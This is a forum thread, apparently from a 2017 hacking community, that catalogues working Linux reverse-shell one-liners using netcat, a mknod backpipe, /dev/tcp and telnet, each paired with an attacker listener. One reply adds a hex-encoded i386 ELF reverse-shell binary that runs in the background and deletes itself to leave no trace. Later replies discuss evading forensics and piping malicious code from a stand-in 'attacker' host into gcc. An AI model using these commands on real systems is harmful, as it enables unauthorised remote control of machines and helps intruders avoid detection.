Spawning reverse shells

ricksanchez · May 31, 2017, 8:22am

Preface

This will be a short article which will demonstrates how to spawn an interactive reverse shell using built-in tools on any Linux distribution.
Also, it shows what mindset and what kind of creativity might be needed when being a hacker or pen tester.

But why?

There are many distributions of Linux and they all do things a little different in regard to built-in tools and/or security mechanisms.
The following examples should be available no matter which OS is in front of you.

Test scenario

being able to run a simple command, or
cause a user to run a simple command on the target system

Examples

In the following examples there will always be a notion like A and T, which
will resemble Attacker and Target to show where to run the commands.

1. netcat

nc <attacker_ip> <port> -e /bin/bash 	# T
nc -n -vv -l -p <port>					# A

In current versions of netcat the -e flag probably won’t be available
anymore, but if it is this makes life really easy.

2. netcat with -e disabled

One could just move on to other tools or means now since the -e flag
is not available anymore, but hey let’s make things look really complicated
and hacker-like

mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe    # T
nc -n -vv -l -p <port>	# A

What does this do?

We create a FIFO file system object and use it as a backpipe to relay standard output from the commands piped from netcat to /bin/bash back to nc.

3. netcat without netcat

/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1      # T
nc -n -vv -l -p <port> 	# A

What does this do?

It takes the /dev/tcp socket programming feature and uses it to redirect /bin/bash to a remote system.

4. netcat without netcat or /dev/tcp

mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe	    # T
nc -n -vv -l -p <port> 	# A

What does this do?

This should be clear by now. We just use telnet instead of netcat with the examples shown in 2nd example above.

5. telnet to telnet

telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>     # T
nc -n -vv -l -p <1st_port> 	# A1
nc -n -vv -l -p <2nd_port>	# A2

What does this do?

This is kinda weird, but it works .
It uses two telnet sessions connected to remote listeners to pipe input from one telnet session to /bin/bash and pipe the output to the second telnet session.

6. What’s next?

This is up to you guys!
What creative ways of spawning a reverse shell do you know or can find?
Let me know and let’s complete this little list.

Peroration

I hope this little article was somewhat fun to read and showed you one thing.
Be creative. If something is not available on the system you work on, find another way. A way nobody would expect you to find or use.

Peace out

0x00pf · May 31, 2017, 6:23pm

Nice post @ricksanchez !
This is my proposal for section 6 (What’s next)

#6. Chuck Norris’ way
Chuck Norris is not a hacker but he pwns any computer just walking close to it

Chuck Norris writes his own reverse shells directly in machine code and types it in hex by heart
Chuck Norris writes IPs and Ports in network order and patches the hex values just staring at the binary dump.
Chuck Norris deletes his footprints as he goes. Actually he can go without leaving any footprint at all.

nc -v -l 1337             # Attacker
echo -e "\x7F\x45\x4C\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x60\x80\x04\x08\x34\x00\x00\x00\xBC\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x28\x00\x03\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\xAA\x00\x00\x00\xAA\x00\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6A\x66\x58\x6A\x01\x5B\x31\xD2\x52\x53\x6A\x02\x89\xE1\xCD\x80\x92\xB0\x66\x68\x7F\x01\x01\x01\x66\x68\x05\x39\x43\x66\x53\x89\xE1\x6A\x10\x51\x52\x89\xE1\x43\xCD\x80\x6A\x02\x59\x87\xDA\xB0\x3F\xCD\x80\x49\x79\xF9\xB0\x0B\x41\x89\xCA\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\xCD\x80\x00\x2E\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2E\x74\x65\x78\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x60\x80\x04\x08\x60\x00\x00\x00\x4A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAA\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" > c; chmod +x c;./c & rm c  # Target

[details=Customize] > Code above connects to 127.0.0.1 1337 from an i386 machine. If you want to change the IP look for \x7F\x01\x01\x01 and if you want to change the port… well you better figure it out .

Note that the binary is executed in the background and immediately deleted, so no track is left in the hard drive…

[/details]

What does this do?

^{Actually, Chuck Norris has read the 0x00sec paper IoT Malware Droppers (Mirai and Hajime)}

ricksanchez · May 31, 2017, 6:48pm

@0x00pf thanks and awesome continuation of the list! Love that approach!

I’m curious if we will see more fun approaches to this.

dtm · May 31, 2017, 7:24pm

Wouldn’t the data still exist such that it could potentially be extracted using some forensics magics? Maybe it’d be better to allocate it some memory in a suspended process, then copied into the allocated memory and executed? This way, it never actually touches the disk.

anon79434934 · May 31, 2017, 7:31pm

Chuck Norris is a dead meme, normie.

on-topic: good article as always. bookmarked it for later reference.

0x00pf · May 31, 2017, 7:34pm

Actually you can easily get it:

cat /proc/PID/exe > binary

The problem is that in order to get the remote shell you need to first run some code. If the access to the target machine was through a remote exploit then what you propose is the right way to go. If you have got just, telnet access, for instance… I do no know how to move something into memory without running some tool to allow that

ricksanchez · May 31, 2017, 7:49pm

@anon79434934 covfefe mate

pry0cc · June 2, 2017, 6:30am

I was messing around with @IoTh1nkN0t on IRC, exploring the possibilities of running binary in the shell. You can already compile C code to stdout.

curl - s https://attacker/malicious-code.c | gcc -o /dev/stdout -x c -

We tried things like ./-, but it seems pretty difficult to execute code, without writing to the disk. In fact, it seems impossible. If we could find a good way to execute binary in the shell without writing to disk, we would have something that would be super useful for things like this.

ricksanchez · June 2, 2017, 6:37am

@pry0cc As far as I know ,at least UNIX kernels expect binary executable files to be stored on the disk.
This seems to be a requirement so the system can perform seek operations to arbitrary offsets, and also map the file contents into memory.
Executing a binary or binary stream from standard input seems quite difficult/impossible.

Welp on the other side theres a defcon paper called PowerPwning: Post-Exploiting By
Overpowering PowerShell which kinda deals with this “not (re-)writing to disk when scripts are run.”

pry0cc · June 2, 2017, 6:58am

By the way, this article is really handy.

ricksanchez · June 2, 2017, 6:09pm

Since this topic of “stealthy reverse shell” got a lot of attention @0x00pf created a new article to clarify the possibilites what is possible and must be considered to prevent disk writings when attempting a reverse shell.
Much kudos to him. Show his article some love, but not more than mine. Pls

CLICK ME HARD

system · January 21, 2018, 12:36am

This topic was automatically closed after 30 days. New replies are no longer allowed.